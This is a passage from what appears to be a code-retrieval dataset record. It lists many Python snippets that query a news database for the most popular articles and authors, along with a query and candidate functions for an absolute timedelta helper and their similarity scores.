and\"\"\"\n \"\"\" log.path != '/' Group By articles.title ORDER By num\"\"\"\n \"\"\" DESC LIMIT 3;\"\"\")", "def most_popular_articles():\n\n results = query_database(QUERIES[0])\n print('\\nWhat are the most popular three articles of all time?\\n')\n for title, views in results:\n print(' * \"{}\" -- {} views'.format(title, views))", "def print_popular_authors():\n print(\"\\nAuthors listed by article views:\\n\")\n views_data = get_query_results(AUTHORS_VIEWS_QUERY)\n author_row_format = '{} - {} views'\n for author, views in views_data:\n print(author_row_format.format(author, views))", "def top_authors(cursor):\n top_auth = 'No authors found.'\n try:\n cursor.execute(\"\"\"\n select name, hits\n from authors, views_by_id as views_by_id\n where id = author\n group by name, hits\n order by hits desc\"\"\")\n\n authors = cursor.fetchall()\n # If no authors were found, return\n if len(authors) <= 0:\n return top_auth\n\n except psycopg2.Error as e:\n print('Fetching authors by popularity: \\r\\n{}'.format(e.pgerror))\n\n # If the query returns any authors, return the results.\n else:\n top_auth = 'Top authors by article views: \\r\\n'\n for auth in authors:\n top_auth += ' {} - {} views\\r\\n'.format(auth[0], auth[1])\n return top_auth", "def get_mostViewedArticles():\n\n query = \"\"\"\n SELECT articles.title,COUNT(*) as views\n FROM articles JOIN log\n ON log.path LIKE ('/article/' || articles.slug)\n GROUP BY articles.title\n ORDER BY views DESC\n LIMIT 3\n \"\"\"\n\n posts = execute_query(query)\n print('\\nWhat are the most popular three articles of all time?')\n for title, views in posts:\n print(title + \" - \" + str(views) + \" views\")", "def print_top_articles():\n\n output = get_query_results(\n '''SELECT articles.title, COUNT(path) AS views\n FROM articles\n JOIN log\n ON log.path=CONCAT('/article/', articles.slug)\n GROUP BY title\n ORDER BY views DESC\n LIMIT 3;'''\n )\n print(\"\\nMost Popular Articles: \\n\")\n for title, views in output:\n print(\"\\\"{}\\\" -- {} views\".format(title, views))", "def get_popular_authors():\n query_command = \"SELECT * from popular authors LIMIT 3\"\n query_data = run_query(query_command)\n return query_data", "def popular_articles():\n query = \"\"\"SELECT articles.title,count(*) AS total_views FROM articles,log WHERE log.path like concat('/article/',articles.slug)\n group by articles.title order by total_views desc limit 3\"\"\"\n result = get_data(query)\n print(\" 1. The most popular three articles of all time:\")\n print(\"\")\n for record in result :\n print(' ' + '\\\"' + str(record[0]) + '\\\"' + '-' + ' ' + str(record[1]) + ' '+ 'views')\n print(\" \")", "def get_most_popular_articles():\n\tdb = psycopg2.connect(database=DBNAME)\n\tc = db.cursor()\n\tc.execute(\"select t2.title, count(*) as total from log as t1,articles as t2 where t1.path=concat('/article/',t2.slug) group by t2.title order by total desc limit 3 ;\")\n\tdata = c.fetchall()\n\tdb.close()\n\treturn data", "def most_viewed_articles():\n query = \"\"\"\n SELECT articles.title, COUNT(*) AS views\n FROM articles\n JOIN log\n ON log.path = '/article/' || articles.slug\n WHERE log.status ='200 OK'\n GROUP BY articles.title ORDER BY views DESC LIMIT 3;\n \"\"\"\n results = psql_connection(query)\n\n print(\"Most viewed articles:\")\n for result in results:\n print '{article} - {count} views'.format(\n article=result[0], count=result[1])", "def count_by_author(all_articles):\n author_count = {}\n\n for title in all_articles:\n author = \", \".join(all_articles[title]['authors'])\n if author not in author_count:\n author_count[author] = 1\n else:\n author_count[author] = author_count[author] + 1\n \n print_all_items_in_dict(author_count)", "def getPopualrAuthors():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n c.execute(\" select count(*) as views , authors.name from articles \"\n + \" inner join \"\n + \"log on concat('/article/', articles.slug) = log.path \"\n + \" inner join authors on articles.author = authors.id \"\n + \"group by name order by views desc; \")\n authors = c.fetchall()\n db.close()\n return authors", "def article_rank():\n db, c = connect(DBNAME)\n c.execute(\"select title, count(title) as views from \\\"pathslug\\\" \"\n \"group by title order by views desc limit 3\")\n article_table = c.fetchall()\n db.close()\n print \"\\nThree Most Popular Articles All Time:\"\n for article in article_table:\n print str(article[0]) + \" - \" + str(article[1]) + \" views\"", "def print_popular_articles(articles):\n for (title, views) in articles:\n print \"\\\"%s\\\" - %d views\" % (title, views)", "def print_authors(popular_authors):\n\n print('\\nThe list of authors being listed as per their popularity:\\n')\n for author in popular_authors:\n print(author[0] + '\\t-\\t' + str(author[1]) + ' views \\n')\n print('-------------------------------------------------------\\n')", "def popular_articles():\n db = psycopg2.connect(\"dbname=news\")\n \"\"\"Connect to news database.\"\"\"\n c = db.cursor()\n \"\"\"Open a cursor to perform database operation.\"\"\"\n query = \"\"\"select title, count(path) as view from articles, log \n where '/article/' || articles.slug = log.path group by title, path \n order by view desc limit 3;\"\"\"\n \"\"\"The cursor runs query and fetches result.\"\"\"\n c.execute(query)\n \"\"\"Execute query using cursor.\"\"\"\n rows = c.fetchall()\n print \"Most popular three articles of all time: \"\n print \"---------------------------------------- \"\n for row in rows:\n print row[0], \"--\", row[1], \" views\"\n db.close()", "def three_most_popular_articles():\n\n # To print information\n information_string = '1. The 3 most popular articles of all time are:\\n'\n\n # Query string\n query = \"\"\"select title,count(*) as num from\n articles,log where\n log.path=CONCAT('/article/',articles.slug)\n group by articles.title\n order by num DESC limit 3;\"\"\"\n\n print(information_string)\n for result in query_db(query):\n print('\\t\"' + str(result[0]) + '\" - ' + str(result[1]) + ' views')\n\n print(\"\\n\")", "def query_article():\r\n conn, cur = connect()\r\n query1 = (\"select * from article limit 3\")\r\n cur.execute(query1)\r\n res = cur.fetchall()\r\n conn.close()\r\n print (\"\\nThe most popular three articles of all time:\\n\")\r\n for i in range(0, len(res), 1):\r\n print (res[i][0] + \" --> \" + str(res[i][1]) + \" views\")", "def recommend_for_new_user(titles=False, n_max=10):\n return reader.UserList().get_most_popular_articles(titles=titles)[: n_max]", "def get_popular_articles():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query_popular_articles = \"\"\"\n SELECT art.title, COUNT(lg.id) as views\n FROM articles as art\n JOIN log as lg\n ON art.slug = substring(lg.path,10)\n AND lg.status = '200 OK'\n GROUP BY art.title\n ORDER BY views desc\n LIMIT 3; \"\"\"\n c.execute(query_popular_articles)\n articles = from_db_cursor(c)\n db.close()\n return articles", "def print_popular_articles():\n print(\"3 most popular articles\\n\")\n popularity_data = get_query_results(POPULARITY_QUERY)\n article_row_format = '\"{}\" — {} views'\n for title, views in popularity_data:\n print(article_row_format.format(title, views))", "def top3_articles():\n\n cur.execute(\"\"\"\n SELECT title, COUNT(*) AS article_title\n FROM article_summary\n GROUP BY title\n ORDER BY article_title DESC\n LIMIT 3;\n \"\"\")\n result = cur.fetchall()\n return result", "def print_top_articles(popular_articles):\n\n print('\\nThe three top most articles viewed are:\\n')\n for article in popular_articles:\n print(article[0] + '\\t-\\t' + str(article[1]) + ' views \\n')\n print('-------------------------------------------------------\\n')", "def getPopularArticles():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n c.execute(\" select count (*) as views, title from articles \"\n + \"left join \"\n + \"log on concat('/article/', articles.slug) = log.path \"\n + \"group by title order by views desc limit 3\")\n views = c.fetchall()\n db.close()\n return views", "def most_similar(self, article: str, topn: int = 5):\n return [article[0] for article in self._model.similar_by_word(article, topn)]", "def how_popular_most_popular(data):\r\n #list of artists\r\n artists = []\r\n for key in data:\r\n if key[-1] != \"$\":\r\n for x in data[key]:\r\n artists += [x]\r\n sorted_artists = selection_sort(artists)\r\n count = 1\r\n max_count = 1\r\n max_artists = []\r\n for i in range(len(sorted_artists)-1):\r\n #ends at second to last index because I use i and i + 1\r\n if sorted_artists[i] == sorted_artists[i+1]:\r\n count += 1\r\n else:\r\n if count == max_count:\r\n max_artists += [sorted_artists[i]]\r\n count = 1\r\n elif count > max_count:\r\n max_artists = []\r\n max_artists += [sorted_artists[i]]\r\n max_count = count\r\n count = 1\r\n return max_count", "def printTopThreeArticles():\n query = \"\"\"\n SELECT author_article_popularity_view.article,\n author_article_popularity_view.views\n FROM author_article_popularity_view\n LIMIT 3;\n \"\"\"\n cursor = connection.cursor()\n cursor.execute(query)\n results = cursor.fetchall()\n print(\"\\nTop 3 articles of all time: \")\n for i, result in enumerate(results):\n print(\"{}. \\\"{}\\\" - {:,} views\".format(i + 1, result[0], result[1]))", "def get_popular_titles():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n # counting views that had status 200\n c.execute(\"select articles.title, count(*) as views \"\n \"from articles, log \"\n \"where log.path like concat('%', articles.slug, '%') \"\n \"and log.status = '200 OK' \"\n \"group by articles.title \"\n \"order by views desc limit 3\")\n results = c.fetchall()\n text_file = open(\"text.txt\", \"a+\") # append to text file\n text_file.write(\"The three most popular articles of all time are:\\n\\n\")\n # for loop to print each article\n for title, views in results:\n text_file.write(\"\\\"\" + title + \"\\\"\" + \" - \" + str(views) + \" views\\n\")\n text_file.write(\"\\n\")\n text_file.close()\n db.close", "def topArticles():\n c = db.cursor()\n c.execute(\"select titles.title, tophits.hits\\\n from tophits, titles\\\n where tophits.path = titles.slug\\\n order by hits desc limit 3;\")\n results = c.fetchall()\n c.close()\n return results", "def print_top_authors():\n\n create_view_top_articles = (\n \"CREATE VIEW top_articles AS \" +\n \"SELECT COUNT(path) AS num, path \" +\n \"FROM log GROUP BY path ORDER BY num DESC;\")\n create_view_top_authors = (\n \"CREATE VIEW top_authors as \" +\n \"SELECT sum(num) as views, author \" +\n \"FROM top_articles, articles \" +\n \"WHERE top_articles.path LIKE '%' || articles.slug GROUP BY author;\")\n get_popular_artists = (\n \"SELECT name, views \" +\n \"FROM authors, top_authors \" +\n \"WHERE top_authors.author = authors.id ORDER BY views DESC;\")\n\n print(\"\\nRunning Task: \" + print_top_authors.__doc__ + \"\\n\")\n\n conn, cur = connect()\n cur.execute(create_view_top_articles)\n cur.execute(create_view_top_authors)\n cur.execute(get_popular_artists)\n results = cur.fetchall()\n\n for title, views in results:\n print('\\t\\\"{}\\\" - {} views'.format(title, views))\n\n disconnect(conn, cur)", "def more_popular(twitter_data, a, b):\r\n \r\n a_popularity = len(all_followers(twitter_data, a)) \r\n b_popularity = len(all_followers(twitter_data, b))\r\n if a_popularity > b_popularity:\r\n return -1\r\n if a_popularity < b_popularity:\r\n return 1\r\n return username_first(twitter_data, a, b)", "def _get_sorted_trend_setters(authors: list) -> dict:\n\n trend_setters = {author: authors.count(author) for author in authors}\n top_trend_setters = dict(sorted(\n trend_setters.items(), key=lambda item: item[1], reverse=True\n ))\n return top_trend_setters", "def get_n_authors(soup):\n n_authors = len(soup.find_all(attrs={\"name\":\"Author\"}))\n return(n_authors)", "def more_popular(twitter_data, a, b):\n\n a_popularity = len(all_followers(twitter_data, a))\n b_popularity = len(all_followers(twitter_data, b))\n if a_popularity > b_popularity:\n return -1\n if a_popularity < b_popularity:\n return 1\n return username_first(twitter_data, a, b)", "def author_entity_frequency_and_popularity(self, author_id):\n return self.db.execute(u'''\n SELECT e.entity, author_freq, SUM(e.frequency) AS entity_popularity, years, max_rho\n FROM entities AS e,\n (\n SELECT entity, COUNT(DISTINCT(document_id)) as author_freq, GROUP_CONCAT(year) as years, MAX(rho) AS max_rho\n FROM entity_occurrences\n WHERE author_id == ? AND rho > ?\n GROUP BY entity\n ) as d_e\n WHERE d_e.entity == e.entity GROUP BY e.entity\n ''', (author_id, DEFAULT_MIN_SCORE)).fetchall()", "def query2():\n\n print(\"2. Who are the most popular article authors of all time?\\n\")\n\n query = \"\"\"\n SELECT authors.name, subq_author.hits FROM authors\n LEFT JOIN\n (SELECT articles.author, CAST(SUM(subq_article.hits) AS INTEGER)\n AS hits FROM articles\n LEFT JOIN\n (SELECT COUNT(log.path) AS hits, log.path FROM log\n WHERE log.path LIKE '/article/%'\n AND log.status = '200 OK' AND log.method = 'GET'\n GROUP BY log.path) AS subq_article\n ON subq_article.path LIKE '/article/'||articles.slug\n GROUP BY articles.author) AS subq_author\n ON authors.id = subq_author.author\n ORDER BY subq_author.hits DESC;\n \"\"\"\n\n response = db_query(query)\n\n for i, j in enumerate(response):\n # Convert tuple to list to allow writing. Format \"hits\" with comma\n # seperator. Print output.\n j = list(j)\n j[1] = str(format(j[1], ',d'))\n print(\" Author: '{}' - {} views\".format(*j))", "def author_articles(self):\n return ArticlePage.objects.live().filter(author=self).order_by('-date')", "def most_popular_artist(our_data):\n counter_dict = {}\n for artist in all_artists(our_data):\n if artist in counter_dict:\n counter_dict[artist] += 1\n else:\n counter_dict[artist] = 1\n maximum_albums = max(counter_dict.values())\n artist_lists = []\n for keys, values in counter_dict.items():\n if values == maximum_albums:\n artist_lists.append(keys) \n return artist_lists", "def nauthors(self):\n return self._nauthors", "def get_top_3_articles():\n query1 = \"\"\"select title, count(*) as views\n from articles, log\n where log.path like '%' || articles.slug\n group by title\n order by views desc\n limit 3;\"\"\"\n results = execute_query(query1)\n for result in results:\n print(\"- \\\"%s\\\" — %s views\" % (result[0], result[1]))", "def get_most_viewed_hashtag():\n tags = HashTags.objects.order_by('-no_of_times_viewed').distinct()[:10]\n return tags", "def get_authors_query():\n\n query = '''select authors.name, count(*) as views\n from authors, articles, log\n where authors.id = articles.author\n and substr(log.path,10)=articles.slug\n group by authors.name order by views desc;'''\n\n return query", "def question_2():\n cursor.execute(mostPopAuthors)\n output = cursor.fetchall()\n return output", "def get_most_popular_artists(data):\r\n #list of artists\r\n artists = []\r\n for key in data:\r\n if key[-1] != \"$\":\r\n for x in data[key]:\r\n artists += [x]\r\n sorted_artists = selection_sort(artists)\r\n count = 1\r\n max_count = 1\r\n max_artists = []\r\n for i in range(len(sorted_artists)-1):\r\n #ends at second to last index because I use i and i + 1\r\n if sorted_artists[i] == sorted_artists[i+1]:\r\n count += 1\r\n else:\r\n if count == max_count:\r\n max_artists += [sorted_artists[i]]\r\n count = 1\r\n elif count > max_count:\r\n max_artists = []\r\n max_artists += [sorted_artists[i]]\r\n max_count = count\r\n count = 1\r\n return max_artists", "def ef_iaf_author(self, author_id):\n total_papers = self.total_papers()\n author_entity_frequency = self.author_entity_frequency_and_popularity(author_id)\n author_papers = self.author_papers_count(author_id)\n return sorted(((\n entity,\n entity_author_freq / float(author_papers),\n log(total_papers/float(entity_popularity)),\n entity_author_freq / float(author_papers) * log(total_papers/float(entity_popularity)),\n max_rho,\n [int(y) for y in years.split(\",\")],\n ) for entity, entity_author_freq, entity_popularity, years, max_rho in author_entity_frequency), key=lambda t: t[3], reverse=True)", "def top_three_articles():\n query = \"\"\"select articles.title,\n article_path_views.views\n from articles, article_path_views\n where '/article/' || articles.slug = article_path_views.path\n order by views desc\n limit 3\"\"\"\n result_table = execute_query(query)\n\n # generate a report from table_to_report() function\n report = table_to_report(result_table, ' views')\n return \"The Top Three of Most Viewed Articles:\\n\" + report", "def top_5_news():\n top_five = []\n\n news = (db.news.find({}).sort([\n ('shares_count', pymongo.DESCENDING),\n ('comments_count', pymongo.DESCENDING),\n ('title', pymongo.ASCENDING)\n ]).limit(5))\n\n for new in news:\n top_five.append((new['title'], new['url']))\n\n return top_five", "def get_popular_article():\n query_command = \"SELECT * from popular_posts LIMIT 3\"\n query_data = run_query(query_command)\n return query_data", "def scrape_author(self, author_name, min_len=0, max_len=9999):\n search = sc.search_author(author_name)\n author = next(search)\n sc.fill(author, sections=['publications'])\n print(author.keys())\n with open(\n 'loadings\\\\authors_papers\\\\{}.txt'.format(author_name),\n 'w',\n encoding='utf-8'\n ) as file:\n for counter, pubblication in enumerate(author['publications']):\n\n if len(pubblication['bib']['title']) < min_len \\\n or len(pubblication['bib']['title']) > max_len:\n continue\n file.write(pubblication['bib']['title'])\n file.write('\\n')\n counter += 1\n if counter > self.hard_limit:\n break", "def top_three_articles(cursor):\n top_articles = 'No articles found'\n try:\n cursor.execute(\"\"\"select title, count(*) as hits\n from articles, log\n where path = ('/article/' || slug)\n group by title\n order by hits desc\n limit 3\n \"\"\")\n article_views = cursor.fetchall()\n # If no articles were found, return\n if len(article_views) <= 0:\n return article_views\n\n except psycopg2.Error as e:\n print('Fetching top articles by views: \\r\\n{}'.format(e.pgerror))\n\n # If the query returns any articles, return the results.\n else:\n top_articles = 'Top articles by views: \\r\\n'\n for result in article_views:\n top_articles += ' \"{0} - {1} views\"\\r\\n'.format(result[0],\n result[1])\n return top_articles", "def get_movie_most_nominations(movies: list) -> str:\n pass", "def pubs_by_articles_published( data ) :\n # let's be Pythonic and use counter\n result = [ (k,v) for k,v in Counter([x['SO'] for x in data]).iteritems() ]\n # now sort\n result.sort( lambda a,b : cmp(b[1],a[1]) )\n return result", "def createAuthorArticlePopularityView():\n query = \"\"\"\n CREATE TEMPORARY VIEW author_article_popularity_view AS\n SELECT COUNT(log.path) AS views,\n author_article_view.title AS article,\n author_article_view.author AS author\n FROM author_article_view LEFT JOIN log\n ON log.path LIKE '%' || author_article_view.slug || '%'\n GROUP BY article, author\n ORDER BY views DESC;\n \"\"\"\n connection.cursor().execute(query)", "def get_article_author(self, article_webpage):\n pass", "def citing_authors(self, entities):\n result = self.db.execute(u'''SELECT DISTINCT(author_id)\n FROM \"entity_occurrences\"\n WHERE entity IN ({}) AND rho > ?'''.format(join_entities_sql(entities)), (DEFAULT_MIN_SCORE,)).fetchall()\n return [t[0] for t in result]", "def get_top_articles(\n limit: int = 5,\n date: int = int(datetime.now().strftime(\"%Y%m%d\"))\n):\n\n res = articles_db.get_top_articles_mongo(\n articles,\n limit,\n date\n )\n\n return res", "def directorsOfMostMovies (movies, count):\n directorCounts = {}\n for movieInfo in movies.values():\n key = movieInfo[1]\n if key not in directorCounts:\n directorCounts[key] = 0\n directorCounts[key] += 1\n return sorted([ (v, k) for (k,v) in directorCounts.items() ], reverse=True)[:count]\n # OR:\n # directors = [ x[1] for x in movies.values() ]\n # directorSet = set(directors)\n # return sorted([ (directors.count(d), d) for d in directorSet ], reverse=True)[:count]", "def keywords(articles, top_n=25):\n\n # compute term idfs\n token_docs = [lemma_tokenize(clean(a.text)) for a in articles]\n local_term_idf = IDF(token_docs)\n\n token_docs, phrases = extract_phrases(token_docs, [a.text for a in articles], global_term_idf)\n\n titles = [a.title for a in articles]\n title_tokens = [lemma_tokenize(clean(t)) for t in titles]\n term_counts = defaultdict(int)\n for doc in token_docs:\n for t in set(doc):\n if t:\n term_counts[t] += 1\n\n title_terms = set()\n for title_tks in title_tokens:\n title_terms = title_terms | set(title_tks)\n for ph in phrases:\n if any(ph in title.lower() for title in titles):\n title_terms.add(ph)\n\n # Score terms\n term_scores = []\n for t, count in term_counts.items():\n # Ignore numbers, they are very specific to a particular event and\n # introduce noise\n try:\n float(t)\n continue\n except ValueError:\n # TODO This is a troublesome token, not sure why it's not filtered out by\n # IDF. needs more investigation\n if t == 'n\\'t':\n continue\n score = count * (global_term_idf[t] - local_term_idf[t])\n if t in title_terms:\n score *= 1.5\n term_scores.append((t, score))\n\n return sorted(term_scores, key=lambda t: t[1], reverse=True)[:top_n]", "def author_entity_frequency(self, author_id):\n return self.db.execute(u'''\n SELECT entity, COUNT(DISTINCT(document_id)) as author_freq, GROUP_CONCAT(year) as years, MAX(rho) AS max_rho\n FROM entity_occurrences\n WHERE author_id == ? AND rho > ?\n GROUP BY entity\n ''', (author_id, DEFAULT_MIN_SCORE)).fetchall()", "def AuthorsCount(self, default=None):\n return self.data.get('metadata', {}).get('author_count', default)", "def get_most_popular_posts():\n popular_posts_ids = [post.id for post in Post.objects.popular()]\n return Post.objects.filter(id__in=popular_posts_ids). \\\n add_comments_count(). \\\n prefetch_related('author'). \\\n prefetch_with_tags_and_likes(). \\\n order_by('likes_count')", "def calculate_most_popular(text, n_populars, steam=False):\n fdist = calculate_fdist(text, steam)\n term = []\n for key, value in fdist.items():\n term.append((key, value))\n term.sort(key=lambda x: int(x[1]), reverse=True)\n return term[:n_populars]", "def top_controversial(self, n):\n return top_movies", "def count_articles(all_articles):\n print(f\"There are {len(all_articles)} articles.\")", "def test_author_many_lastnames(self):\n inv_search = 'author:\"alvarez gaume, j* r* r*\"'\n spi_search = 'find a alvarez gaume, j r r'\n self._compare_searches(inv_search, spi_search)", "def test_discussion_filter_author(self):\n author_vals = (\n ('DoesNotExist', 0),\n ('admin', 1),\n ('jsocol', 4),\n )\n\n for name, number in author_vals:\n u = UserFactory(username=name)\n for i in range(number):\n thread1 = ThreadFactory(title=u'audio')\n PostFactory(thread=thread1, author=u)\n\n self.refresh()\n\n qs = {'a': 1, 'w': 4, 'format': 'json'}\n\n for author, total in author_vals:\n qs.update({'author': author})\n response = self.client.get(reverse('search.advanced'), qs)\n eq_(total, json.loads(response.content)['total'])", "def most_popular(self, n):\n return popular_tags", "def top_articles_by_views(articles, top_x):\n p = PageviewsClient()\n\n # create date string based on previous month\n now = datetime.datetime.now()\n previous_month = str(now.month - 1).zfill(2)\n if previous_month == \"00\": previous_month = \"12\"\n start_date = str(now.year) + previous_month + \"0100\"\n end_date = str(now.year) + previous_month + \"2800\"\n\n # get views\n result = p.article_views('en.wikipedia', articles, \n granularity='monthly', start=start_date, end=end_date)\n # clean results (six is used for backwards compatibility with python 2\n result = six.next(six.itervalues(result))\n sorted_articles = sorted(result.items(), \n key=operator.itemgetter(1), reverse=True)\n return sorted_articles[:top_x]", "def getAuthor(self):\n\t\tself.authorList = [submission.author for submission in self.subreddit.top(time_filter = 'day', limit = self.limits)]\n\t\treturn self.authorList", "def latest_content(request):\n latest_articles = Article.published_articles()[:5]\n latest_comments = Comment.objects.all().order_by('-pub_date')[:5]\n tags = Tag.objects.annotate(num_articles=Count('article')).order_by(\n '-num_articles')\n contributors = Contributor.objects.annotate(\n num_articles=Count('article')).order_by('-num_articles')\n return {'latest_articles': latest_articles,\n 'latest_comments': latest_comments,\n 'tags': tags,\n 'contributors': contributors,\n }", "def get_most_popular_annotations(ambiguous_entity, k=2):\n freq = [(key, len(value)) for key, value in ambiguous_entity.annotated_corpus.items()]\n freq = sorted(freq, key=lambda x: x[1], reverse=True)\n return [x[0] for x in freq[:k]]", "def most_popular(n=5):\n cars = Car.objects.annotate(review_number=models.Count('reviews'))\n sorted_cars = cars.order_by('review_number')\n return sorted_cars[:n]", "def author_visualisation(self, spam_collection):\n\n spam_author_collection = dict.fromkeys(spam_collection)\n for data, author_set in spam_collection.iteritems():\n for author in author_set:\n spam_author_collection[author] = 1\n\n for data, author_set in spam_collection.iteritems():\n for author in author_set:\n spam_author_collection[author] += 1\n\n spam_list = sorted(spam_author_collection.items(), key=operator.itemgetter(1))\n\n group = []\n values = []\n iterator = 5\n for spam in reversed(spam_list):\n group.append(spam[0])\n values.append(spam[1])\n if iterator == 0:\n break\n iterator -= 1\n\n y_pos = np.arange(len(group))\n\n plt.barh(y_pos, values, align='center', alpha=0.5)\n plt.yticks(y_pos, group)\n plt.xlabel('Number of Spam Comments')\n plt.ylabel('YouTube Author')\n plt.title('Top 5 Spamming Authors \\nin YouTube Comment Corpus')\n\n plt.show()", "def get_word_counts(messages_by_author):\n counters_by_author = {}\n for author in messages_by_author.keys():\n author_counter = Counter()\n for message in messages_by_author[author]:\n author_counter += Counter(get_words(string_to_onlyalpha(message.content)))\n counters_by_author[author] = author_counter\n return counters_by_author", "def get_most_popular_merchants(self):\n if self.model:\n return self.model.wv.index_to_key[: self.num_rec]\n else:\n print(\"train the model before performing this step\")\n return None", "def popularity(self, user_list):\n item_popular = Counter(self.train['movieId'].values)\n ret = 0\n n = 0\n print('\\nCalculate popularity: ')\n for user in tqdm(user_list):\n recom_data = self._get_recommend(user)\n for rec in set([data[0] for data in recom_data]):\n ret += math.log(1 + item_popular.get(rec))\n n += 1\n ret /= n * 1.0\n print('\\npopularity: ', ret)\n return ret", "def print_top_articles():\n\n create_view_top_articles = (\n \"CREATE VIEW top_articles AS \" +\n \"SELECT COUNT(path) AS num, path \" +\n \"FROM log GROUP BY path ORDER BY num DESC;\")\n get_popular_articles_names = (\n \"SELECT title, num \" +\n \"FROM top_articles, articles \" +\n \"WHERE top_articles.path = '/article/' || articles.slug limit 3;\")\n\n print(\"\\nRunning Task: \" + print_top_articles.__doc__ + \"\\n\")\n\n conn, cur = connect()\n cur.execute(create_view_top_articles)\n cur.execute(get_popular_articles_names)\n results = cur.fetchall()\n\n for title, views in results:\n print('\\t{} - {} views'.format(title, views))\n\n disconnect(conn, cur)", "def get_artists_most_played(session_):\n # artists = session_.query(Artist).order_by(Artist.name.asc()).paginate()\n artists = session_.query(Artist).order_by(Artist.plays.desc()).all()\n return artists", "def get_top_articles(update=False):\n # use caching to avoid running unnecessary DB queries at each page load\n key = 'top_ten'\n articles = memcache.get(key)\n\n logging.warn('MEMCACHE | Wiki articles %s' % str(articles))\n\n if (articles is None) or (len(articles) == 0) or update:\n # necessary artificial delay when a new article has just been persisted to the datastore\n if update:\n time.sleep(2)\n\n articles = db.GqlQuery('SELECT * FROM Article ORDER BY updated DESC LIMIT 10')\n articles = list(articles)\n memcache.set(key, articles)\n\n logging.warn('DATASTORE | Wiki articles count %s' % str(len(articles)))\n return articles", "def most_missed_creators(self, cache_max_age=0):\n expected_items = []\n query = u'CLAIM[195:%s] AND NOCLAIM[170]' % \\\n ',195:'.join(self.collections) # collection\n wd_queryset = wdquery.QuerySet(query)\n\n wd_query = wdquery.WikidataQuery(cacheMaxAge=cache_max_age)\n data = wd_query.query(wd_queryset)\n\n if data.get('status').get('error') == 'OK':\n expected_items = data.get('items')\n\n creator_dict = {}\n counter = 0\n for q_val in expected_items:\n q_item = self.wd.QtoItemPage(q_val)\n data = q_item.get()\n claims = data.get('claims')\n if u'P170' in claims:\n continue\n descr = data.get('descriptions').get('en')\n if descr and descr.startswith(u'painting by '):\n creator = descr[len(u'painting by '):]\n if '(' in creator: # to get rid of disambiguation addition\n creator = creator[:creator.find('(')].strip()\n if creator in creator_dict.keys():\n creator_dict[creator] += 1\n else:\n creator_dict[creator] = 1\n counter += 1\n pywikibot.output(u'Found %d mentions of %d creators' %\n (counter, len(creator_dict)))\n # output\n f = codecs.open(u'creatorHitlist.csv', 'w', 'utf-8')\n for k, v in creator_dict.iteritems():\n f.write(u'%d|%s\\n' % (v, k))\n f.close()", "def get_authors_count(self, institution):\n return self.db.execute(u'''SELECT COUNT(*) FROM authors WHERE institution==?''', (institution,)).fetchall()[0][0]", "def get_most_popular(self):\n\t\tpopular_rated = self.data_final[self.data_final['Rating'] == 10]\n\t\tpopular_jokes = popular_rated.groupby('JokeID').count().reset_index()\n\t\tpopular_jokes = popular_jokes[['JokeID','Rating']]\n\t\tpopular_jokes.columns = ['JokeID','Number_rated10']\n\t\ttop_joke = popular_jokes.sort_values(by=['Number_rated10'], ascending=False).head(1)\n\t\ttop_joke_val = top_joke['JokeID'].values[0]\n\t\tjokes_list = sorted(set(self.data_final['JokeID']))\n\t\tjoke_num = jokes_list.index(top_joke_val)\n\t\ttop_joke_desc = self.data_jokes[self.data_jokes['JokeID'] == top_joke_val].values[0][1]\n\n\t\treturn top_joke_desc, joke_num", "def count_word_usage(counters_by_author, word_list):\n specific_word_counter = {}\n for author in counters_by_author.keys():\n word_counter = Counter()\n for item in counters_by_author[author]:\n for word in word_list:\n if word in item:\n print(item)\n word_counter[word] += counters_by_author[author][item]\n specific_word_counter[author] = word_counter\n return specific_word_counter", "def get_ars(self, author):\n return self.divided[author][:-1]" ]
[ "0.84637415", "0.8395699", "0.8325273", "0.8321845", "0.8157658", "0.80273575", "0.7990549", "0.7792252", "0.77818847", "0.7686615", "0.7682264", "0.76261973", "0.75585544", "0.7522089", "0.7496455", "0.73912114", "0.7381132", "0.735024", "0.73232555", "0.7270634", "0.7169818", "0.7095853", "0.7026694", "0.70194745", "0.69743323", "0.6874296", "0.6849663", "0.6833659", "0.67938805", "0.6748801", "0.6726414", "0.67242295", "0.6662603", "0.6633716", "0.6553412", "0.6537264", "0.6521089", "0.6444699", "0.6391774", "0.63315666", "0.63079435", "0.62826186", "0.62631345", "0.61919844", "0.6156478", "0.61327577", "0.61229473", "0.6074733", "0.6030435", "0.6030301", "0.6008949", "0.6004238", "0.5970723", "0.5959741", "0.59556615", "0.59487104", "0.5947171", "0.5936569", "0.5932458", "0.5917469", "0.59126264", "0.5858251", "0.58462816", "0.5837916", "0.580749", "0.57878405", "0.5779664", "0.57781", "0.5770056", "0.5768499", "0.57487106", "0.57287484", "0.57282513", "0.5705889", "0.5703658", "0.56998706", "0.5691021", "0.56820655", "0.5673636", "0.5672209", "0.56129634", "0.56022006", "0.55984503", "0.5589036", "0.5577613", "0.557558", "0.55661345", "0.5565078", "0.55430865", "0.5499661", "0.5481679", "0.5472018", "0.5471405", "0.54623276", "0.54582757", "0.5458091", "0.54483646", "0.54405403", "0.54369015", "0.5436589", "0.5434653" ]
0.0
-1
Returns an "absolute" value for a timedelta, always representing a time distance.
def abs_timedelta(delta): if delta.days < 0: now = datetime.datetime.now() return now - (now + delta) return delta
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def abs_timedelta(delta):\r\n if delta.days < 0:\r\n now = _now()\r\n return now - (now + delta)\r\n return delta", "def delta(self, abs_value=False):\n return self.current - self.last if not abs_value else np.abs(self.current - self.last)", "def timedelta(self) -> datetime.timedelta:\n factor = -1 if self.negative else 1\n return datetime.timedelta(\n hours=factor * self.hours, minutes=factor * self.minutes\n )", "def abs(value):\n return _abs(value)", "def day_absolute_to_relative(absolute):\n today = datetime.datetime.today()\n date = datetime.datetime.strptime(absolute, \"%Y-%m-%d\")\n return abs((today - date).days)", "def abs(self, a):\n return abs(a)", "def delta(self) -> timedelta:\n delta = self.data.get(\"delta\", 0)\n return timedelta(seconds=delta)", "def apparent_to_absolute_magnitude(apparent_magnitude, distance):\n distance_in_parsecs = distance / (648000. * astronomical_unit / np.pi)\n absolute_magnitude = apparent_magnitude - 5*np.log10(distance_in_parsecs) + 5\n return absolute_magnitude", "def abs_(a):", "def get_absolute_datetime(reference, offset):\n absolute_datetime = reference + 